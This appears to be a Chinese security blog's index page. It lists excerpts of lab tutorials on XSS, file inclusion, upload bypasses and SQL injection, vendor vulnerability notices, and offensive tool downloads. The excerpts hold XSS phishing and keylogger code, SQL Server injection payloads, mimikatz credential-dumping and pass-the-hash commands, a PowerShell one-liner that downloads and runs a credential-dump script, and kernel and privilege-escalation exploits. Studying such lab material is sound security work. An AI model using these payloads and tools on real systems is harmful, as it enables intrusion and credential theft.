爱国小白帽

更好都不行,我只做最好

  • 博客(52)
  • 资源 (28)
  • 论坛 (6)
  • 问答 (1)
  • 收藏
  • 关注

原创 【漏洞挖掘实战篇】论文查重暗藏玄机,可能你的论文被卖了你都不知道
原力计划

导语前两天看到一篇文章,说“我的论文被卖了”,想想都可怕,出于正义我准备把这些网站挖出来,以下就是我挖掘的整个过程。这就是那篇文章,转送门首先是信息搜集...

2020-02-29 13:57:23 6220 20

翻译 KR00K .CVE-2019-15126漏洞报告【翻译】

2020-02-28 19:30:55 1508

转载 Wi-Fi漏洞Kr00k曝光:全球数十亿台设备受影响

Wi-Fi漏洞Kr00k曝光:全球数十亿台设备受影响cnBeta [四维创智](javascript:void(0)???? 今天由赛普拉斯半导体(Cypress Semiconductor)和博通(Broadcom)制造的Wi-Fi芯片存在严重安全漏洞,让全球数十亿台设备非常容易受到黑客的攻击,能让攻击者解密他周围空中传输的敏感数据。在今天开幕的RSA安全会议中,这项安全漏洞被公开。而对于Ap...

2020-02-28 18:51:52 843

原创 漏洞复现篇——PHP反序列化漏洞
原力计划

简介PHP反序列化漏洞也叫PHP对象注入,是一个非常常见的漏洞,这种类型的漏洞虽然有些难以利用,但一旦利用成功就会造成非常危险的后果。漏洞的形成的根本原因是程序没有对用户输入的反序列化字符串进行检测,导致反序列化过程可以被恶意控制,进而造成代码执行、getshell等一系列不可控的后果。反序列化漏洞并不是PHP特有,也存在于Java、Python等语言之中,但其原理基本相通。什么是序列化和...

2020-02-28 12:43:26 2264

原创 漏洞复现篇——命令执行漏洞
原力计划

什么是命令执行漏洞?日常的网络访问中,我们常常可以看到某些Web网站具有执行系统命令的功能,比如:有些网站提供ping功能,我们可以输入一个IP地址,它就会帮我们去尝试ping目标的IP地址,而我们则可以看到执行结果。但是如果用户没有遵循网站的本意,而去输入精心构造的指令,可能会对网站本身的功能逻辑产生逆转,导致让目标网站执行恶意命令。命令执行漏洞-分类web代码层命令执行ex...

2020-02-27 21:36:17 976

原创 漏洞复现篇——任意代码命令执行漏洞复现及防御

什么是代码执行:当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能够控制这个字符串,将造成代码注入漏洞。代码执行函数:在php中:eval,assert,preg_replace(‘/*/e’, 'ret="1";′,ret = "\\1";',ret="1";′,data);在asp中:eval, exevute,executeglobal在jsp中:jsp中没有p...

2020-02-27 20:43:09 2118

转载 【漏洞通告】微软Exchange远程代码执行漏洞(CVE-2020-0688)处置手册

【漏洞通告】微软Exchange远程代码执行漏洞(CVE-2020-0688)处置手册原创 威胁对抗能力部 [绿盟科技安全情报](javascript:void(0)???? 今天通告编号:NS-2020-00122020-02-27TAG:微软、Exchange、远程代码执行危害等级:高,攻击者利用此漏洞可实现远程代码执行,从而控制Exchange服务器。应急等级:...

2020-02-27 18:00:23 2739

转载 【漏洞通告】微软Exchange远程代码执行漏洞(CVE-2020-0688)通告

【漏洞通告】微软Exchange远程代码执行漏洞(CVE-2020-0688)通告原创 绿盟安全服务部 绿盟科技安全情报 今天通告编号:NS-2020-00122020-02-26TAG:微软、Exchange、远程代码执行危害等级:高,攻击者利用此漏洞可实现远程代码执行,从而控制Exchange服务器。应急等级:黄色版本:1.01漏洞概述北...

2020-02-26 22:39:10 2072

原创 漏洞复现篇——CSRF漏洞的利用

CSRF漏洞原理CSRF(Cross Site Request Forgery, 跨站请求伪造)是一种网络的攻击方式,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF。CSRF漏洞是因为web应用程序在用户进行敏感操作时,如修改账号密码、添加账号、转账等,没有校验表单token或者http请求头中的referer值,从而导致恶意攻击...

2020-02-25 23:47:21 1686

原创 漏洞复现篇——XSS靶场小游戏

实验环境:PHPstudyxss闯关小游戏火狐浏览器

2020-02-25 19:08:19 2878

原创 漏洞复现篇——利用XSS漏洞实现多种网络钓鱼方法

实验环境:PHPstudy火狐浏览器、IEDVWA靶场实验准备:重定向钓鱼,例如重定向到百度,代码如下:< script> document.location ="http://www.baidu.com" </script> ...

2020-02-24 21:27:19 3468

原创 BlueLotus_XSSReceiver——XSS数据接收工具的使用

XSS数据接收平台(无SQL版)如从旧版本升级,请务必先阅读Readme平台说明本平台设计理念: 简单配置即可使用,无需数据库,无需其他组件支持,可直接在php虚拟空间使用实验环境:PHPstudyPHPstudy_pro火狐浏览器DVWA靶场BlueLotus_XSSReceiver实验准备:PHPstudy端口改为88将BlueLotus_XSSReceive...

2020-02-24 21:01:24 1744 5

原创 kali中浏览器攻击框架BeEF的使用

BeEF( The Browser Exploitation Framework) 是由Wade Alcorn 在2006年开始创建的,至今还在维护。是由ruby语言开发的专门针对浏览器攻击的框架。这个框架也属于cs的结构实验环境:PHPstudy火狐浏览器、IEDVWA靶场kali安装:新版kali里面没有需要安装,命令如下:apt-get install beef-x...

2020-02-24 19:33:02 4991

原创 盘点抖音上的整蛊程序,会了这些谁还敢跟你玩?小心没朋友啦

千万不要随意尝试,否则后果自负哦!!! ????????????☝????????如果有疑问欢迎写信哦,不要盲目的拿别人做实验整蛊程序一、系统清理废话不多说直接上源码@echo offecho 正在为您的系统加速...echo 正在优化系统...ping 127.0.0.1 -n 10 >nulecho 正在删除垃圾文件...ping 127.0.0.1...

2020-02-23 14:11:38 5527 17

原创 Google黑客常用搜索语句(新增)
原力计划

通过这些搜索语句你可以搜索到想要的任何东西,如果你还有其他更好的语句欢迎补充inurl:share.cgi?ssid= 云服务器文件和文件夹共享intitle:"Welcome to QNAP Turbo NAS" QNAP登录页面inurl:"img/main.cgi?next_file" ...

2020-02-22 09:38:56 7179 2

原创 漏洞复现篇——利用XSS漏洞实现键盘记录

实验环境:PHPstudy火狐浏览器、IEDVWA靶场实验准备:在www目录下创建一个名为keylog.php的文件,代码如下:<?php$file = fopen("key.txt","a");if(isset($_REQUEST['key'])) { $key = $_REQUEST['key']; fputs($file,$key);}?>模拟实验...

2020-02-21 19:51:28 953

转载 【漏洞通告】fastjson 1.2.62远程代码执行漏洞通告

【漏洞通告】fastjson<=1.2.62远程代码执行漏洞通告原创 绿盟安全服务部 绿盟科技安全情报 今天通告编号:NS-2020-00112020-02-21TAG:fastjson、Jackson-databind、远程代码执行危害等级:高,攻击者利用此漏洞,可造成远程代码执行。应急等级:蓝色版本:1.01漏洞概述2月19日,NV...

2020-02-21 19:08:30 3096

转载 【漏洞通告】Jackson-databind远程代码执行漏洞(CVE-2020-8840)通告

【漏洞通告】Jackson-databind远程代码执行漏洞(CVE-2020-8840)通告原创 绿盟安全服务部 绿盟科技安全情报 今天通告编号:NS-2020-00102020-02-21TAG:Jackson-databind、远程代码执行、CVE-2020-8840漏洞危害:攻击者利用此漏洞,可造成远程代码执行。版本:1.01漏洞概述2月19...

2020-02-21 17:26:07 8931

转载 【威胁通告】微软 SQL Server 远程代码执行漏洞(CVE-2020-0618)威胁通告

【威胁通告】微软 SQL Server 远程代码执行漏洞(CVE-2020-0618)威胁通告原创 绿盟安全服务部 绿盟科技安全情报 4天前通告编号:NS-2020-00082020-02-17TAG:SQL Server、远程代码执行、CVE-2020-0618漏洞危害:攻击者利用此漏洞,可造成远程代码执行,PoC已公开。版本:1.01漏洞概述2月...

2020-02-21 12:02:09 3015

转载 【威胁通告】Apache Tomcat 文件包含漏洞(CVE-2020-1938)威胁通告

【威胁通告】Apache Tomcat 文件包含漏洞(CVE-2020-1938)威胁通告原创 绿盟安全服务部 绿盟科技安全情报 昨天通告编号:NS-2020-00092020-02-20TAG:Apache Tomcat、文件包含、CVE-2020-1938漏洞危害:攻击者利用此漏洞,可未授权读取任意文件。*版本:1.01漏洞概述2月20日,国家信...

2020-02-21 09:47:13 6534 8

原创 漏洞复现篇——利用XSS漏洞获取cookie

实验环境:PHPstudy火狐浏览器、IEDVWA靶场

2020-02-20 18:50:46 1036

原创 漏洞复现篇——XSS三种攻击方式讲解

实验环境:PHPstudy火狐浏览器、IEDVWA靶场模拟实验:DOM:1、把级别调成low,选择DOM点击Select2、将url中的English换成<script>alert(/xxx/)</script>,出现弹窗Reflected1、在框中输入<script>alert(/xxx/)</script>,点击Subm...

2020-02-20 12:08:34 2612

原创 漏洞复现篇——文件包含漏洞进阶-截断包含

这种方法只适合于老版本magic_quotes_gpc=off的时候实验环境:PHPstudy2013注意这个选项不要勾写一个php文件,代码如下:<?phpif(isset($_GET['page'])) { include$_GET['page'] .".php";}else { include'home.php'; }?>利用这个文件就可以看...

2020-02-19 23:51:30 766

原创 漏洞复现篇——文件包含漏洞进阶-日志文件漏洞

日志文件漏洞原理当某个PHP文件存在本地包含漏洞,而却无法上传正常文件,这就意味这有包含漏洞却不能拿来利用,这时攻击者就有可能会利用apache日志文件来入侵。Apache服务器运行后会生成两个日志文件,这两个文件是access.log(访问日志)和error.log(错误日志),apache的日志文件记录下我们的操作,并且写到访问日志文件access.log之中例如:http://192...

2020-02-19 22:40:22 806

原创 漏洞复现篇——文件包含漏洞进阶-PHP协议漏洞

PHP带有很多内置URL风格的封装协议,可用于类似fopen()、copy()、file_exists()和filesize()的文件系统函数。支持的协议和封装协议file:// — 访问本地文件系统http:// — 访问 HTTP(s) 网址ftp:// — 访问 FTP(s) URLsphp:// — 访问各个输入/输出流(I/O streams)zlib:// — 压缩流...

2020-02-19 21:23:02 2751

原创 漏洞复现篇——文件包含漏洞(DVWA靶场---File Inclusion【低中高级绕过】)

实验环境:PHPstudyDVWA靶场菜刀环境搭建1、将DVWA Security級別换成low2、打开php的配置文件,搜索allow_url_include,把off换成on,然后重启模拟实验本地文件包含(LFI)1、点击File Inclusion中的file1.php2、在图示位置输入C:\Windows\System32\drivers\etc\hosts...

2020-02-19 15:32:42 1765

原创 漏洞复现篇——二次渲染绕过(upload-labs---16关)

实验环境:PHPstudyBurp Suite抓包软件 | 下载 | 教程 |upload-labs-master上传漏洞靶场火狐浏览器第十六关1、创建PHP文件源码:<?php $f= fopen ("shell.php","w") ;fputs ($f,'<?php phpinfo();?>');?>2、选择创建好的PHP文件3、再...

2020-02-19 12:43:24 3544 3

原创 漏洞复现篇——条件竞争漏洞(upload-labs---17关)

条件竞争漏洞是一种服务器端的漏洞,由于服务器端在处理不同用户的请求时是并发进行的,因此,如果并发处理不当或相关操作逻辑顺序设计的不合理时,将会导致此类问题的发生。实验环境:PHPstudyBurp Suite抓包软件 | 下载 | 教程 |upload-labs-master上传漏洞靶场火狐浏览器第十六关1、创建PHP文件源码:<?php $f= fopen ...

2020-02-18 22:32:34 2520

原创 漏洞复现篇——IIS7.0/7.5/Nginx的解析漏洞

漏洞原理Nginx拿到文件路径(更专业的说法是URI)/test.jpg/test.php后,一看后缀是.php,便认为该文件是php文件,转交给php去处理。php一看/test.jpg/test.php不存在,便删去最后的/test.php,又看/test.jpg存在,便把/test.jpg当成要执行的文件了,又因为后缀为.jpg,php认为这不是php文件,于是返回“Access den...

2020-02-18 15:08:10 1974

原创 漏洞复现篇——ewebeditor编辑器解析漏洞

在线web编辑器,也叫做富文本 编辑器。富文本编辑器,Rich Text Editor, 简称 RTE, 是一种可内嵌于浏览器,所见即所得的文本编辑器。富文本编辑器不同于文本编辑器,程序员可到网上下载免费的富文本编辑器内嵌于自己的网站或程序里(当然付费的功能会更强大些),方便用户编辑文章或信息。比较好的文本编辑器有kindeditor,fckeditor等。这样的程序,能够在网站上写文档的...

2020-02-18 00:10:34 693

原创 漏洞复现篇——Apache的解析漏洞

漏洞原理:Apache 解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断。比如 test.php.a.b的“.a”和”.b” 这两种后缀是apache不可识别解析,apache就会把test.php.a.b解析成test.php。实验环境:PHPstudyApache服务器(wamp2.0)实验模拟:在www目录下创建名为1.php.a.b的文件...

2020-02-17 21:03:31 2531

原创 物理主机ping不通虚拟机的解决方案(Windows)

1、查看虚拟机ip2、使用物理机ping虚拟机,不通3、打开物理机网络连接,按图示勾选,注意此处虚拟适配器是VMnet84、点开Internet协议版本4 (TCP/IPv4)将IP和DNS全都选择自动获得5、回到虚拟机点开虚拟网络编辑器6、看看网络连接是不是NET模式,虚拟适配器是不是VMnet87、完成后再次尝试,搞定...

2020-02-17 20:11:18 1047

原创 漏洞复现篇——.htaccess文件解析漏洞

实验环境:PHPstudyphp5.6以下不带nts的版本upload-labs-master上传漏洞靶场服务器没有禁止.htaccess文件的上传,且服务商允许用户使用自定义.htaccess文件原理:.htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或...

2020-02-17 20:04:55 2933 5

原创 漏洞复现篇——iis6.0解析漏洞

实验环境:win2003iis服务器如图示点击,安装IIS服务使用物理机ping不通虚拟机按图示勾选,注意此处虚拟适配器是VMnet8点开Internet协议版本4 (TCP/IPv4)将IP和DNS全都选择自动获得回到虚拟机点开虚拟网络编辑器看看网络连接是不是NET模式,虚拟适配器是不是VMnet8`完成后再次尝试,成功...

2020-02-17 19:25:37 512

原创 python自学篇——PyGame模块的所有功能函数详解

PyGame是SDL多媒体库的Python包装器模块。它包含python函数和类,允许您使用SDL对播放cdroms、音频和视频输出以及键盘、鼠标和操纵杆输入的支持。☛点我一键到底☚????????????☝????????有疑问欢迎写信哦游戏首页文件自述关于游戏的基本信息:它是什么,涉及到谁,在哪里找到它。安装在多个平台上编译游戏所需的步骤。还可以帮助您为系统查找和安装预构建的二进制文件。...

2020-02-16 19:32:33 8396 2

原创 漏洞复现篇——文件上传之mime绕过

什么是MIMEMIME(Multipurpose Internet Mail Extensions)多用途互联网邮件扩展类型。是设定某种扩展名的文件用一种应用程序来打开的方式类型,当该扩展名文件被访问的时候,浏览器会自动使用指定应用程序来打开。绕过上传限制-服务端绕过MIME检测常见的MIME类型text/plain(纯文本)text/html(HTML文档)text/java...

2020-02-15 23:38:07 787

原创 浏览器黑客常用插件

1.Flagfox2.FoxyProxy Standard3.User-Agent Switcher快速、轻松地在流行的用户-代理字符串之间切换。4.New Hackbar一个站点栏,帮助测试人员在他们的浏览器中执行手工的web安全测试。这个插件是用webex张力和替代原来Hackbar的XUL版本编写的。5.Max HackBar此钢条由Mr.sile...

2020-02-14 15:31:25 1209 3

原创 upload-labs文件上传漏洞靶场1-14关

第一关使用Burp Suite上传文件在桌面创建1.php文件,写入一句话木马保存,然后将后缀名改为jpg点击浏览选中创建好的jpg文件然后点击上传,效果如下上传成功使用Burp Suite抓包将文件格式改成php文件,点击Forward发送数据包查看C:\phpStudy\PHPTutorial\WWW\upload-labs-master下的upload文件夹,出现1....

2020-02-13 22:28:42 879

原创 漏洞复现篇——文件上传之js绕过

漏洞说明:Web应用系统虽然对用户上传的文件进行了校验,但是校验是通过前端javascript代码完成的。由于恶意用户可以对前端javascript进行修改或者是通过抓包软件篡改上传的文件,就会导致基于js的校验很容易被绕过。实验环境:火狐浏览器PHPstudyBurp Suite抓包软件upload-labs-master上传漏洞靶场首先判断是否存在前端js绕过漏洞按F1...

2020-02-13 17:03:25 579

原创 SQL注入篇——SqlServer的报错注入

一、获取当前的数据库使用函数db_name()id=1 and 1=convert(int,(select top 1 db_name()))二、获取当前数据库的表将获取到的数据库名与.sys.sysobjects拼接id=1 and 1= convert(int,(select top 1 name FROM text.sys.sysobjects where xtype = 'U...

2020-02-12 23:30:43 1214 4

冰蝎window版Behinder_v3.0_Beta_6_win .zip

Behinder “冰蝎”动态二进制加密网站管理客户端 功能介绍原文链接: 《利用动态二进制加密实现新型一句话木马之客户端篇》 https://xz.aliyun.com/t/2799 工作原理原文链接: 《利用动态二进制加密实现新型一句话木马之Java篇》 https://xz.aliyun.com/t/2744 《利用动态二进制加密实现新型一句话木马之.NET篇》 https://xz.aliyun.com/t/2758 《利用动态二进制加密实现新型一句话木马之PHP篇》 https://xz.aliyun.com/t/2774 运行环境 客户端:jre8+ 服务端:.net

2020-12-25

2020HW工具包.zip

原则文章蓝军HVV实用工具和网站总结(工具已打包) :https://admin-root.blog.csdn.net/article/details/108692522

2020-09-23

upload-labs-master.zip

简介 upload-labs是一个使用php语言编写的,专门收集渗透测试过程中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共19关,每一关都包含着不同上传方式。 注意 1.每一关没有固定的通关方法,大家不要自限思维! 2.本项目提供的writeup只是起一个参考作用,希望大家可以分享出自己的通关思路。 3.实在没有思路时,可以点击查看提示。 4.如果黑盒情况下,实在做不出,可以点击查看源码。

2020-02-13

dedecmsV5.7靶机源码.zip

DedeCMS应用领域 DedeCMS适合应用于以下领域: •企业网站,无论大型还是中小型企业,利用网络传递信息在一定程度上提高了办事的效率,提高企业的竞争力; •政府机关,通过建立政府门户,有利于各种信息和资源的整合,为政府和社会公众之间加强联系和沟通,从而使政府可以更快、更便捷、更有效开展工作; •教育机构,通过网络信息的引入,使得教育机构之间及教育机构内部和教育者之间进行信息传递,全面提升教育类网站的层面; •媒体机构,互联网这种新媒体已经强而有力的冲击了传统媒体,在这个演变过程中,各类媒体机构应对自己核心有一个重新认识和重新发展的过程,建立一个数字技术平台以适应数字化时代的需求; •行

2020-12-25

华军1433mssql数据库弱口令扫描工具

华军1433mssql数据库弱口令扫描工具

2020-03-25

PEiD0.95.zip

PE iDentifier v0.95 (2008.10.21) by snaker, Qwerton, Jibz & xineohP ------------------------------------------------------ PEiD detects most common packers, cryptors and compilers for PE files. It can currently detect more than 600 different signatures in PE files. PEiD is special in some aspects when compared to other identifiers already out there! 1. It has a superb GUI and the interface is really intuitive and simple. 2. Detection rates are amongst the best given by any other identifier. 3. Special scanning modes for *advanced* detections of modified and unknown files. 4. Shell integration, Command line support, Always on top and Drag'n'Drop capabilities. 5. Multiple file and directory scanning with recursion. 6. Task viewer and controller. 7. Plugin Interface with plugins like Generic OEP Finder and Krypto ANALyzer. 8. Extra scanning techniques used for even better detections. 9. Heuristic Scanning options. 10. New PE details, Imports, Exports and TLS viewers 11. New built in quick disassembler. 12. New built in hex viewer. 13. External signature interface which can be updated by the user. There are 3 different and unique scanning modes in PEiD. The *Normal Mode* scans the PE files at their Entry Point for all documented signatures. This is what all other identifiers also do. The *Deep Mode* scans the PE file's Entry Point containing section for all the documented signatures. This ensures detection of around 80% of modified and scrambled files. The *Hardcore Mode* does a complete scan of the entire PE file for the documented signatures. You should use this mode as a last option as the small signatures often tend to occur a lot in many files and so erroneous outputs may result. The scanner's inbuilt scanning techniques have error control methods which generally ensure correct outputs even if the last mode is chosen. The first two methods produce almost instantaneous outputs but the last method is a bit slow due to obvious reasons! Command line Options -------------------- PEiD now fully supports commandline parameters. peid -time // Show statistics before quitting peid -r // Recurse through subdirectories peid -nr // Don't scan subdirectories even if its set peid -hard // Scan files in Hardcore Mode peid -deep // Scan files in Deep Mode peid -norm // Scan files in Normal Mode peid <file1> <file2> <dir1> <dir2> You can combine one or more of the parameters. For example. peid -hard -time -r c:\windows\system32 peid -time -deep c:\windows\system32\*.dll Task Viewing / Control Module ----------------------------- You can scan currently running tasks with PEiD. The files are scanned from memory. Processes can also be terminated. You can also optionally dump a module and scan the dumped image. You can also view all dependant modules of the processes. Multiple File Scan Module ------------------------- You can scan multiple files at one go with PEiD. Just drag and drop the files on the PEiD main dialog and the Multiple File Scan Dialog will popup displaying the results. You can keep dragging and dropping files onto this dialog as well. It also offers you to choose from the different scanning modes and optionally load a single file in PEiD. It allows you to skip the non PE files so that the list looks clean. You can also scan the contents of a directory choosing files of custom extension if required. MFS v0.02 now supports recursive directory scanning. Disassembler Module ------------------- You can have a quick disassembly of the file loaded in PEiD. Double click to follow JMPs and CALLs and use the Back button to trace back to the original positions. You can copy disassembled output to the clipboard. A new CADT core with custom String Reference Finder has been cooked up. CADT is coded by Ms-Rem. Hex Viewer Module ------------------- You can have a quick hex view of the file loaded in PEiD. A modified version of 16Edit by y0da is used for this purpose. We intend to update the signatures quite often to keep pace with this ever evolving scene :) Please report bugs, ideas, new signatures or packer info to: pusher -> sir.pusher(at)gmail(dot)com ( Administration / Coder ) snaker -> snaker(at)myrealbox(dot)com Jibz -> peid(at)ibsensoftware(dot)com Qwerton -> qwaci(at)gmx(dot)net ALL SUGGESTIONS, IDEAS, BUG REPORTS AND CRITICS ARE WELCOME. History ------- 0.7 Beta -> First public release. 0.8 Public -> Added support for 40 more packers. OEP finding module. Task viewing/control module. GUI changes. General signature bug fixes. Multiple File and Directory Scanning module. 0.9 Recode -> Completely recoded from scratch. New Plugin Interface which lets you use extra features. Added more than 130 new signatures. Fixed many detections and general bugs. 0.91 Reborn -> Recoded everything again. New faster and better scanning engine. New internal signature system. MFS v0.02 now supports Recursive Scanning. Commandline Parser now updated and more powerful. Detections fi

2020-07-27

Advanced_IP_Scanner IP扫描工具

Advanced_IP_Scanner IP扫描工具

2020-04-03

mimikatz,ms14068

mimikatz mimikatz is a tool I've made to learn C and make somes experiments with Windows security. It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets. .#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03) .## ^ ##. ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' with 13 modules * * */ mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::logonpasswords Authentication Id : 0 ; 515764 (00000000:0007deb4) Session : Interactive from 2 User Name : Gentil Kiwi Domain : vm-w7-ult-x SID : S-1-5-21-1982681256-1210654043-1600862990-1000 msv : [00000003] Primary * Username : Gentil Kiwi * Domain : vm-w7-ult-x * LM : d0e9aee149655a6075e4540af1f22d3b * NTLM : cc36cf7a8514893efccd332446158b1a * SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30 tspkg : * Username : Gentil Kiwi * Domain : vm-w7-ult-x * Password : waza1234/ ... But that's not all! Crypto, Terminal Server, Events, ... lots of informations in the GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki or on http://blog.gentilkiwi.com (in French, yes). If you don't want to build it, binaries are availables on https://github.com/gentilkiwi/mimikatz/releases Quick usage log privilege::debug sekurlsa sekurlsa::logonpasswords sekurlsa::tickets /export sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd kerberos kerberos::list /export kerberos::ptt c:\chocolate.kirbi kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi crypto crypto::capi crypto::cng crypto::certificates /export crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::keys /export crypto::keys /machine /export vault & lsadump vault::cred vault::list token::elevate vault::cred vault::list lsadump::sam lsadump::secrets lsadump::cache token::revert lsadump::dcsync /user:domain\krbtgt /domain:lab.local Build mimikatz is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are: - for mimikatz and mimilib : Visual Studio 2010, 2012 or 2013 for Desktop (2013 Express for Desktop is free and supports x86 & x64 - http://www.microsoft.com/download/details.aspx?id=44914) - for mimikatz driver, mimilove (and ddk2003 platform) : Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 mimikatz uses SVN for source control, but is now available with GIT too! You can use any tools you want to sync, even incorporated GIT in Visual Studio 2013 =) Synchronize! - GIT URL is : https://github.com/gentilkiwi/mimikatz.git - SVN URL is : https://github.com/gentilkiwi/mimikatz/trunk - ZIP file is : https://github.com/gentilkiwi/mimikatz/archive/master.zip Build the solution - After opening the solution, Build / Build Solution (you can change architecture) - mimikatz is now built and ready to be used! (Win32 / x64) - you can have error MSB3073 about _build_.cmd and mimidrv, it's because the driver cannot be build without Windows Driver Kit 7.1 (WinDDK), but mimikatz and mimilib are OK. ddk2003 With this optional MSBuild platform, you can use the WinDDK build tools, and the default msvcrt runtime (smaller binaries, no dependencies) For this optional platform, Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 and Visual Studio 2010 are mandatory, even if you plan to use Visual Studio 2012 or 2013 after. Follow instructions: - http://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme - http://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader Licence CC BY 4.0 licence - https://creativecommons.org/licenses/by/4.0/ Author - Benjamin DELPY gentilkiwi, you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com ) - DCSync function in lsadump module was co-writed with Vincent LE TOUX, you contact him by mail ( vincent.letoux [at] gmail.com ) or visit his website ( http://www.mysmartlogon.com ) This is a personal development, please respect its philosophy and don't use it for bad things!

2020-04-02

Invoke-WCMDump结合powershell进行密码获取

Ivoke-WCMDump 什么是Credential Manager Credential Manager,中文翻译为凭据管理器,用来存储凭据(例如网站登录和主机远程连接的用户名密码),如果用户选择存储凭据,那么当用户再次使用对应的操作,系统会自动填入凭据,实现自动登录,凭据保存在特定的位置,被称作为保管库(vault)(位于%localappdata%/Microsoft\Vault) 从Credential Manager导出Windows凭据的Powershell脚本 https://github.com/peewpw/Invoke-WCMDump PS>Import-Module .\Invoke-WCMDump.ps1 PS>Invoke-WCMDump powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1');Invoke-WCMDump"

2020-03-26

dirtycow脏牛linux提权exp

dirtycow脏牛linux提权exp

2020-03-25

tunna实用工具

tunna实用工具

2020-03-25

hash密码抓取工具大全

hash密码抓取提取密码工具大全

2020-03-25

扫描工具大合集,包括代理、IP、端口、目录等扫描

扫描工具大合集,包括代理、IP、端口、目录等扫描

2020-03-25

CentOS 5.5提权exp

CentOS 5.5提权exp

2020-03-20

内网穿透工具Tunna-master.zip

>Tunna:一款神奇的工具,它可以通过HTTP封装隧道通信任何TCP,以及用于绕过防火墙环境中的网络限制。 > 命令`python proxy.py -u http://192.168.70.129/conn.aspx -l 2345 -a 10.1.1.1 -r 3389 -s -v` 参数含义如下: : -l 表示本地监听的端口 -r 远程要转发的端口 -v 详细模式

2020-03-18

QuarksPwDump_v0.1.zip

先看简介 Quarks PwDump是一个Win32环境下系统授权信息导出工具,目前除此之外还木有没有任何一款工具可以导出如此全面的信息,支持这么多的OS版本,(包括xP/2003/Vista/7/2008/8),经测试相当稳定。作者开发这个工具的原因是现在没有一款工具能同时抓取所有类型的hash和Bitlocker信息。这个工具没有注入任何进程,工作原理是神马呢,源代码值得读一下。 源地址在这:http://code.google.com/p/quarkspwdump/ 可以导出 : - Local accounts NT/LM hashes + history 本地NT/LM哈希+历史登录记录 - Domain accounts NT/LM hashes + history 域中NT/LM哈希+历史登录记录 - Cached domain password 缓存里的域密码 - Bitlocker recovery information (recovery passwords & key packages) 使用了Bitlocker的恢复信息(恢复密码&关键包) 用法参考说明如下: quarks-pwdump.exe <option(s)> <NTDS file> Options :参数 –dump-hash-local /*Dump出本机HASH*/ -dump-hash-domain-cached /*Dump出域内缓存的Hash*/ -dump-hash-domain (NTDS_FILE must be specified) /*Dump出域内的Hash,NTDS_FILE必须被指定*/ –dump-bitlocker (NTDS_FILE must be specified) /*Dump出BitLocker遗留信息*/ –with-history (optional) -output-type JOHN/LC (optional, if no=>JOHN) /*导出为Lc4或John The Ripper支持的格式*/ –output FILE (optional, if no=>stdout) /*导出结果到文件*/ 木有其他系统 请大家另行测试。 如需导出可以 C:\>quarkspwdump --dump-hash-local --output c:\xxxxx C:\>quarkspwdump --dump-hash-local --output-type LC --output c:\xxxxx

2020-03-16

mof提权文件nullevt.mof

mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户的命令。 mof文件通过Mofcomp.exe编译执行。

2020-03-12

nc端口监听工具瑞士军刀

什么是nc nc是netcat的简写,有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用,被设计为一个简单、可靠的网络工具 nc的作用 (1)实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口 (2)端口的扫描,nc可以作为client发起TCP或UDP连接 (3)机器之间传输文件 (4)机器之间网络测速                                                                                                                                                                                                                         nc的控制参数不少,常用的几个参数如下所列: 1) -l 用于指定nc将处于侦听模式。指定该参数,则意味着nc被当作server,侦听并接受连接,而非向其它地址发起连接。 2) -p <port> 暂未用到(老版本的nc可能需要在端口号前加-p参数,下面测试环境是centos6.6,nc版本是nc-1.84,未用到-p参数) 3) -s  指定发送数据的源IP地址,适用于多网卡机  4) -u  指定nc使用UDP协议,默认为TCP 5) -v 输出交互或出错信息,新手调试时尤为有用 6)-w 超时秒数,后面跟数字  7)-z 表示zero,表示扫描时不发送任何数据       前期准备 准备两台机器,用于测试nc命令的用法 主机A:ip地址 10.0.1.161 主机B:ip地址 10.0.1.162   两台机器先安装nc和nmap的包 yum install nc -y yum install nmap -y 如果提示如下-bash: nc: command not found 表示没安装nc的包 ———————————————— 版权声明:本文为CSDN博主「小毛毛2013」的原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接及本声明。 原文链接:https://blog.csdn.net/u012486730/article/details/82019996

2020-03-11

漏洞利用EXP windows-kernel-exploits-master.zip

本地溢出提权首先要有服务器的一个普通用户权限,攻击者通常会向服务器上传本地溢出程序,在服务器端执行,如果系统存在漏洞,那么将溢出Administrator权限。以下是不同系统提权的漏洞和相应的补丁。

2020-03-10

后渗透专用的提权大马

